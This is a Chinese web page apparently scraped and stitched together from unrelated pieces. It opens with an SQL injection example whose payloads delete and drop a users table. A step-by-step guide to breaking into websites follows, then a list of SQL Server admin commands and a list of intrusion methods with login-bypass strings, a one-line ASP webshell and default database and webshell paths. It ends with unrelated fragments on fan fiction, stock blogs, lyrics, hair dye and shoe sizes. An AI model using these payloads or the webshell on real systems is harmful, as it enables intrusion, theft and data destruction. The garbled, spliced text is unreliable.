select * from users where userid='; go delete users; go' and truename='; go drop table users; go'
类似上面的,在''之间,填写上如上语句,就会把users表清空和删除。
之一步:SQL注入点探测。探测SQL注入点是关键的之一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。通常只要带有输入提交的动态网页,并且动态网页访问数据库,就可能存在SQL注入漏洞。如果程序员信息安全意识不强,采用动态构造SQL语句访问数据库,并且对用户输入未进行有效验证,则存在SQL注入漏洞的可能性很大。一般通过页面的报错信息来确定是否存在SQL注入漏洞。
第二步:收集后台数据库信息。不同数据库的注入 *** 、函数都不尽相同,因此在注入之前,我们先要判断一下数据库的类型。判断数据库类型的 *** 有很多,可以输入特殊字符,如单引号,让程序返回错误信息,我们根据错误信息提示进行判断,还可以使用特定函数来判断。
第三步:猜解用户名和密码。数据库中的表和字段命名一般都是有规律的,通过构造特殊的SQL语句在数据库中依次猜解出表名、字段名、字段数、用户名和密码。
第四步:查找Web后台管理入口。Web后台管理通常不对普通用户开放,要找到后台管理的登录网址,可以利用Web目录扫描工具快速搜索到可能的登录地址,然后逐一尝试,便可以找到后台管理平台的登录网址。
第五步:入侵和破坏。一般后台管理具有较高权限和较多的功能,使用前面已破译的用户名、密码成功登录后台管理平台后,就可以任意进行破坏,比如上传木马、篡改网页、修改和窃取信息等,还可以进一步提权,入侵Web服务器和数据库服务器。
如果服务器(网站)被入侵了,一般都是服务器或者网站存在漏洞,被黑客利用并提权入侵的,导致服务器中木马,网站被挂黑链,被篡改,被挂马。解决办法:如果程序不是很大,可以自己比对以前程序的备份文件,然后就是修复,或者换个服务器,更好是独立服务器。也可以通过安全公司来解决,国内也就Sinesafe和绿盟等安全公司 比较专业.
我是从事IDC行业的.以上这些也是平时工作中经常遇到的问题.希望我的回答对你有所帮助.
常用SQL语句
1. 查看数据库的版本
select @@version
2. 查看数据库所在机器操作系统参数
exec master..xp_msver
3. 查看数据库启动的参数
sp_configure
4. 查看数据库启动时间
select convert(varchar(30),login_time,120) from master..sysprocesses where spid=1
查看数据库服务器名和实例名
print 'Server Name...............: ' + convert(varchar(30),@@SERVERNAME)
print 'Instance..................: ' + convert(varchar(30),@@SERVICENAME)
5. 查看所有数据库名称及大小
sp_helpdb
重命名数据库用的SQL
sp_renamedb 'old_dbname', 'new_dbname'
6. 查看所有数据库用户登录信息
sp_helplogins
查看所有数据库用户所属的角色信息
sp_helpsrvrolemember
修复迁移服务器时孤立用户时,可以用的fix_orphan_user脚本或者LoneUser过程
更改某个数据对象的用户属主
sp_changeobjectowner [@objectname =] 'object', [@newowner =] 'owner'
注意: 更改对象名的任一部分都可能破坏脚本和存储过程。
把一台服务器上的数据库用户登录信息备份出来可以用add_login_to_aserver脚本
7. 查看链接服务器
sp_helplinkedsrvlogin
查看远端数据库用户登录信息
sp_helpremotelogin
8.查看某数据库下某个数据对象的大小
sp_spaceused @objname
还可以用sp_toptables过程看更大的N(默认为50)个表
查看某数据库下某个数据对象的索引信息
sp_helpindex @objname
还可以用SP_NChelpindex过程查看更详细的索引情况
SP_NChelpindex @objname
clustered索引是把记录按物理顺序排列的,索引占的空间比较少。
对键值DML操作十分频繁的表我建议用非clustered索引和约束,fillfactor参数都用默认值。
查看某数据库下某个数据对象的的约束信息
sp_helpconstraint @objname
9.查看数据库里所有的存储过程和函数
use @database_name
sp_stored_procedures
查看存储过程和函数的源代码
sp_helptext '@procedure_name'
查看包含某个字符串@str的数据对象名称
select distinct object_name(id) from syscomments where text like '%@str%'
创建加密的存储过程或函数在AS前面加WITH ENCRYPTION参数
解密加密过的存储过程和函数可以用sp_decrypt过程
10.查看数据库里用户和进程的信息
sp_who
查看SQL Server数据库里的活动用户和进程的信息
sp_who 'active'
查看SQL Server数据库里的锁的情况
sp_lock
进程号1--50是SQL Server系统内部用的,进程号大于50的才是用户的连接进程.
spid是进程编号,dbid是数据库编号,objid是数据对象编号
查看进程正在执行的SQL语句
dbcc inputbuffer ()
推荐大家用经过改进后的sp_who3过程可以直接看到进程运行的SQL语句
sp_who3
检查死锁用sp_who_lock过程
sp_who_lock
11.收缩数据库日志文件的 ***
收缩简单恢复模式数据库日志,收缩后@database_name_log的大小单位为M
backup log @database_name with no_log
dbcc shrinkfile (@database_name_log, 5)
12.分析SQL Server SQL 语句的 *** :
set statistics time {on | off}
set statistics io {on | off}
图形方式显示查询执行计划
在查询分析器-查询-显示估计的评估计划(D)-Ctrl-L 或者点击工具栏里的图形
文本方式显示查询执行计划
set showplan_all {on | off}
set showplan_text { on | off }
set statistics profile { on | off }
13.出现不一致错误时,NT事件查看器里出3624号错误,修复数据库的 ***
先注释掉应用程序里引用的出现不一致性错误的表,然后在备份或其它机器上先恢复然后做修复操作
alter database [@error_database_name] set single_user
修复出现不一致错误的表
dbcc checktable('@error_table_name',repair_allow_data_loss)
或者可惜选择修复出现不一致错误的小型数据库名
dbcc checkdb('@error_database_name',repair_allow_data_loss)
alter database [@error_database_name] set multi_user
CHECKDB 有3个参数:
repair_allow_data_loss 包括对行和页进行分配和取消分配以改正分配错误、结构行或页的错误,
以及删除已损坏的文本对象,这些修复可能会导致一些数据丢失。
首先,观察指定网站。
入侵指定网站是需要条件的:
要先观察这个网站是动态还是静态的。
如果是静态的(.htm或html),一般是不会成功的。
如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。
Quote:以下是入侵网站常用 *** :
1.上传漏洞如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
2.注入漏洞字符过滤不严造成的
3.暴库:把二级目录中间的/换成%5c
4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a
5.社会工程学。这个我们都知道吧。就是猜解。
6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 (数据库必需得是ASP或ASA的后缀)
比如:默认数据库,默认后台地址,默认管理员帐号密码等
8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp/diy.asp/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
工具:网站猎手 挖掘鸡 明小子
文笔不错,芥川慈郎,暮云春树网王之我本善良。 网王切原的耽美小说,同人,小海带来了。 。冰帝里的小海带。我要把你染红小海带的立海大历险记。像这种温馨不太虐的小说。网王。不然如何对得起老天的厚待前世没。网王。向日岳人求丸井文太。额。网王同人。我的幸。网王之街舞少女。求关于网王的小说。酱油之歌狼毛绿红莲...
有没有更高的,这9大新浪博客博主每天点击量以亿万计。 股民收看收听大牌博主分析行情。上个月在北京有新浪财经博客电击量排名前10位的一个聚会。 徐小明和wu2198的博客,不是一,每次打开后就能看到。 1徐小明的BLOG徐小明。研判板块与个股走势。 点击率1徐小明的BLOG徐小明,或者你点击F5刷新,...
作词梁东伟、00。爱情过客词聂杰曲王键唱赵齐踏上最后一班末班车是时候该离开了眼泪也不经意地滑落原来一切结束了爱是秋天最后的落叶已无力挽回什么爱到最后结果你选。貌似是一首网络歌曲。 十年前,每当深夜。他不知道我的当迷雾拨开,,迷惑已久的她找到真正原因原来他从七岁便已经爱上了她与其说。 moli小宝。作...
废材逆天四小姐无赖皇上爆笑宠妃邪王请自重,太子重生,昏君助我去宫斗,系统之宠妃,夺位后定年号昭武。 她的梦想是吃饱喝足不被卖掉。有趣的是。求大神,她的梦想是平安出宫开点心铺,重生之荣妃后宫宠妃养成系统攻心之兮离传做宠妃的日子重生之后宫开挂人生庶女宠妃后宫上位记重生之宠妃一梦大清重生之漪兰小筑清穿之我...
叫他给我染成杨千嬅那种,性别女生日1974,所以千嬅也喜欢紫色,好心的xdjm们。 有时候是因为光线的原因,我就说葡萄紫,如果整个头都染紫色就没那么好看了。这个颜色很好做的。 不要全部染成紫色,要怎么跟理发师说看好不是志明与春娇是春娇与志明第二部也就是,她只染了她头发的上面一层所以看起来才会那么自然...
平常穿3买36码会不会小了,貌似听说匡威的帆。 我35的脚穿他家所谓35的鞋子其实就跟穿36一样。 所以匡威35码对应的中国尺码应该是38码.鉴于。 给你个参考吧我一般穿39的鞋匡威的话35稍宽松37长度正好但略挤,正版匡威鞋码偏大。匡威的鞋码一般比国内的鞋码大半码。 40的,是41码,鞋偏窄,如果...